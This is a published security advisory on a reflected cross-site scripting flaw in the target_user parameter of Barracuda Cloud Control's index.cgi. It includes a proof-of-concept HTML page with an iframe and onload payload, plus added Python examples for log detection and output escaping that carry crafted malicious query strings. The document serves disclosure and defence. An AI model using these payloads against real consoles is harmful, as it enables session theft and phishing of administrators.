Barracuda Cloud Control 3.020 Cross Site Scripting

2018-07-18T00:00:00
ID PACKETSTORM:148602
Type packetstorm
Reporter Benjamin Kunz Mejri
Modified 2018-07-18T00:00:00

Description

                                        
Document Title:
===============  
Barracuda Cloud Control v3.020 - CS Cross Site Vulnerability  
  
  
References (Source):  
====================  
http://www.vulnerability-lab.com/get_content.php?id=662  
  
  
Release Date:  
=============  
2018-07-18  
  
  
Vulnerability Laboratory ID (VL-ID):  
====================================  
662  
  
  
Common Vulnerability Scoring System:  
====================================  
3.3  
  
  
Vulnerability Class:  
====================  
Cross Site Scripting - Non Persistent  
  
  
Current Estimated Price:  
========================  
500€ - 1.000€
  
  
Product & Service Introduction:  
===============================  
The Barracuda Control Center is a comprehensive cloud-based service that
enables administrators to monitor and configure multiple Barracuda
Networks products from a single console. With the Barracuda Control
Center, you can check the health of all connected devices, run reports
that are generated by gathering data from all the devices, and assign
roles with varied permissions to different types of users. The powerful
Web interface of the Barracuda Control Center provides for convenient
configuration and management of multiple Barracuda Networks device
settings, while also providing a view of each device Web interface for
individual configuration or reporting. No need to install software or
deploy hardware. Key statistics can be viewed by device type at a glance
on the Status page of the Web interface with the ability to drill down
for more detail into the individual Web interface for each connected
device.
  
(Copy of the Vendor Homepage:  
https://www.barracudanetworks.com/ns/downloads/Setup_Guides/Barracuda_Cloud_Control_SG_US.pdf)  
  
  
Abstract Advisory Information:  
==============================  
The Vulnerability Laboratory Research Team discovered a client-side  
Cross Site Scripting Vulnerability in the official Barracuda Networks  
Cloud Control Center v3.0.0.020 appliance web-application.  
  
  
Vulnerability Disclosure Timeline:  
==================================  
2018-07-18: Non-Public Disclosure (Vulnerability Laboratory)  
  
  
Discovery Status:  
=================  
Published  
  
  
Affected Product(s):  
====================  
Barracuda Networks  
Product: Cloud Control Center 3.0.0.020  
  
  
Exploitation Technique:  
=======================  
Remote  
  
  
Severity Level:  
===============  
Medium  
  
  
Authentication Type:  
====================  
No authentication (guest)  
  
  
User Interaction:  
=================  
Low User Interaction  
  
  
Disclosure Type:  
================  
Bug Bounty Program  
  
  
Technical Details & Description:  
================================  
A cross site scripting vulnerability has been discovered in the official
Barracuda Networks Cloud Control Center v3.0.0.020 appliance
web-application. The vulnerability allows remote attackers to inject
their own malicious script code into client-side application requests.

The vulnerability is located in the `target_user` parameter of the
`Benutzer bearbeiten (Benutzerspezifische Bayessche Daten)` module.
Remote attackers are able to inject client-side script code into the
index.cgi GET method request. The application does not encode the script
code and displays the insecure message context as output. This results
in execution of the client-side script code in the appliance
web-application. The attack vector of the bug is client-side and the
request method to inject is GET.

The security risk of the non-persistent cross site scripting
vulnerability is estimated as medium with a CVSS (Common Vulnerability
Scoring System) score of 3.3.
Exploitation of the client-side vulnerability requires no privileged
web-application user account and low or medium user interaction.
Successful exploitation of the vulnerability results in account theft,
client-side phishing, client-side external redirects to malicious
sources and client-side manipulation of affected or connected module
context.
  
Request Method(s):  
[+] GET  
  
Vulnerable Module(s):  
[+] Benutzer bearbeiten - Benutzerspezifische Bayessche Daten  
  
Vulnerable Parameter(s):  
[+] target_user  
  
Affected Module(s):  
[+] index.cgi  
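
The following log check is an added example, not part of the original advisory or of any Barracuda code. It flags GET requests to index.cgi whose target_user value, after repeated URL-decoding, contains markup characters; the combined access-log format, the sample lines and all function names are assumptions.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample lines (assumed combined log format, documentation IPs).
SAMPLE_LOG = [
    '198.51.100.7 - - [18/Jul/2018:10:00:01 +0000] "GET /cgi-mod/index.cgi?secondary_tab=edit_user&target_user=benny%40barracuda.com&ispopup=1 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [18/Jul/2018:10:00:05 +0000] "GET /cgi-mod/index.cgi?secondary_tab=edit_user&target_user=1337benny%40barracuda.com%22%3E%3Ciframe%20src%3Dx%3E&ispopup=1 HTTP/1.1" 200 5188',
    '203.0.113.9 - - [18/Jul/2018:10:00:09 +0000] "GET /cgi-mod/index.cgi?target_user=a%2522%253Eb HTTP/1.1" 200 5001',
    '198.51.100.7 - - [18/Jul/2018:10:00:12 +0000] "GET /cgi-mod/other.cgi?target_user=%3Cb%3E HTTP/1.1" 404 0',
]

REQUEST_RE = re.compile(r'"GET (\S+) HTTP/[\d.]+"')
MARKUP_RE = re.compile(r'[<>"\'`]')  # characters that can break out of the HTML cell


def fully_decode(value: str, rounds: int = 3) -> str:
    """Undo nested percent-encoding (bounded) so double-encoded input is seen."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_requests(lines):
    """Return (line_number, decoded_value) for index.cgi hits with markup."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if not url.path.endswith("/index.cgi"):
            continue  # the advisory names index.cgi as the affected module
        values = parse_qs(url.query, keep_blank_values=True).get("target_user", [])
        for value in values:  # parse_qs has already decoded one layer
            decoded = fully_decode(value)
            if MARKUP_RE.search(decoded):
                hits.append((number, decoded))
    return hits


if __name__ == "__main__":
    for number, value in suspicious_requests(SAMPLE_LOG):
        print(f"line {number}: target_user={value!r}")
```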
  
  
Proof of Concept (PoC):  
=======================  
The non-persistent cross site scripting vulnerability can be exploited
by remote attackers with medium or high required user interaction.
For security demonstration or to reproduce the vulnerability, follow the
provided information and steps below.
  
  
Standard: Example  
https://bcc.127.0.0.1:1336/cgi-mod/index.cgi?password=befc663e87db8e886c5d8afe5f73cc3e&et=1342741957&  
primary_tab=BASIC&new_secondary_tab=user_management&auth_type=Local&nodeid=13633&locale=de_DE&  
secondary_tab=edit_user&page_submitted=550a4ef30b4d0aa5d5435c2f09b3c09c&content_only=1&target_user=  
benny%40barracuda.com&tree_name=devices&tree_filter=bccadmin&user=  
benny%40barracuda.com&ispopup=1&parent_name=user_management&popup_width=800&popup_height=500  
  
  
PoC: Exploitation  
<html>  
<head><body>  
<title>Barracuda Cloud Control v3.020 - Cross Site Scripting PoC</title>  
<iframe  
src=https://bcc.127.0.0.1:1336/cgi-mod/index.cgi?password=befc663e87db8e886c5d8afe5f73cc3e&et=1342741957&  
primary_tab=BASIC&new_secondary_tab=user_management&auth_type=Local&nodeid=13633&locale=de_DE&  
secondary_tab=edit_user&page_submitted=550a4ef30b4d0aa5d5435c2f09b3c09c&content_only=1&target_user=  
1337benny%40barracuda.com"><iframe src=http://www.vulnerability-lab.com  
onload=alert("VulnerabilityLab") <  
&tree_name=devices&tree_filter=bccadmin&user=benny%40barracuda.com&ispopup=1&parent_name=  
user_management&popup_width=800&popup_height=500></iframe>  
</body></head>  
<html>  
  
  
PoC: INDEX.CGI - Mail Listing (Output) (Benutzer bearbeiten >  
Benutzerspezifische Bayessche Daten) [target_user]  
<tr class="config_module_tr" id="config_module_row_1">  
<td valign="top" width="15"> </td>  
<td valign="top" width="150">Benutzerspezifische Bayessche Daten:</td>  
<td valign="top" width="310">1337benny@barracuda.com"><[EXECUTION OF  
CLIENT SIDE SCRIPT CODE!])' <<="" td="">  
<td valign="top"> </td>  
</tr>  
  
  
Reference(s):  
https://bcc.127.0.0.1:1336/  
https://bcc.127.0.0.1:1336/cgi-mod/  
https://bcc.127.0.0.1:1336/cgi-mod/index.cgi  
  
  
Solution - Fix & Patch:  
=======================  
The vulnerability can be patched by securely parsing and encoding the
input in the vulnerable index.cgi file.
Restrict the input of the values marked as vulnerable and disallow the
usage of special chars.
Use entities and filter all inputs, with exception handling, to prevent
client-side exploitation.
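
The reflection described under Technical Details and the fix described above, side by side, as an added example that is not part of the original advisory or Barracuda's code. The handler names, the allow-list pattern and the shortened query strings are assumptions; the row markup follows the output excerpt in the PoC section.

```python
import html
import re
from typing import Tuple
from urllib.parse import parse_qs

# Assumed allow-list: target_user is an e-mail style account name.
USER_RE = re.compile(r"[A-Za-z0-9._+-]{1,64}@[A-Za-z0-9.-]{1,253}")

# Row layout taken from the advisory's output excerpt.
ROW = ('<tr class="config_module_tr" id="config_module_row_1">'
       '<td valign="top" width="150">Benutzerspezifische Bayessche Daten:</td>'
       '<td valign="top" width="310">{cell}</td></tr>')

# Constructed query strings (shortened from the advisory's example request).
GOOD = "content_only=1&target_user=benny%40barracuda.com&tree_name=devices"
BAD = ("content_only=1&target_user=1337benny%40barracuda.com"
       "%22%3E%3Ciframe%20src%3Dx%3E&tree_name=devices")


def _target_user(query: str) -> str:
    return parse_qs(query, keep_blank_values=True).get("target_user", [""])[0]


def render_unsafe(query: str) -> str:
    """Behaviour the advisory describes: the value is echoed without encoding."""
    return ROW.format(cell=_target_user(query))


def render_hardened(query: str, strict: bool = True) -> Tuple[int, str]:
    """Reject values outside the allow-list, and entity-encode on output anyway."""
    user = _target_user(query)
    if strict and not USER_RE.fullmatch(user):
        return 400, "invalid target_user"
    return 200, ROW.format(cell=html.escape(user, quote=True))


if __name__ == "__main__":
    print(render_unsafe(BAD))            # markup reaches the page unchanged
    print(render_hardened(BAD))          # rejected by the allow-list
    print(render_hardened(BAD, False))   # encoding alone keeps it inert text
    print(render_hardened(GOOD))
```

Encoding at output is the control that closes the bug; the allow-list is the input restriction the advisory recommends alongside it.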
  
  
Note: The issue was reported in 2016 Q4 to the Barracuda Networks
developer team. The issue was finally resolved in 2017 Q3 - Q4.
The disclosure process took about 8 months to complete, taking the
patch cycle into account.
  
  
Security Risk:  
==============  
The security risk of the non-persistent cross site scripting  
vulnerability in the target_user value parameter is estimated as medium.  
  
  
Credits & Authors:  
==================  
Benjamin Kunz Mejri (Vulnerability Lab) [research@vulnerability-lab.com]  
- https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab  
  
  
Disclaimer & Information:  
=========================  
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties, either
expressed or implied, including the warranties of merchantability and
capability for a particular purpose. Vulnerability-Lab or its suppliers
are not liable in any case of damage, including direct, indirect,
incidental, consequential loss of business profits or special damages,
even if Vulnerability Labs or its suppliers have been advised of the
possibility of such damages. Some states do not allow the exclusion or
limitation of liability mainly for incidental or consequential damages
so the foregoing limitation may not apply. We do not approve or
encourage anybody to break any licenses, policies, deface websites, hack
into databases or trade with stolen data. We have no need for criminal
activities or membership requests. We do not publish advisories or
vulnerabilities of religious-, militant- and racist-
hacker/analyst/researcher groups or individuals. We do not publish trade
researcher mails, phone numbers, conversations or anything else to
journalists, investigative authorities or private individuals.
  
  
Any modified copy or reproduction, including partial usage, of this
file, resources or information requires authorization from Vulnerability
Laboratory. Permission to electronically redistribute this alert in its
unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability Lab Research Team or its suppliers.
All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the
specific authors or managers. To record, list, modify, use or edit our
material contact (admin@) to ask for permission.

Copyright © 2018 | Vulnerability Laboratory - [Evolution Security GmbH]™
  
  
  
  
--   
VULNERABILITY LABORATORY - RESEARCH TEAM  
SERVICE: www.vulnerability-lab.com  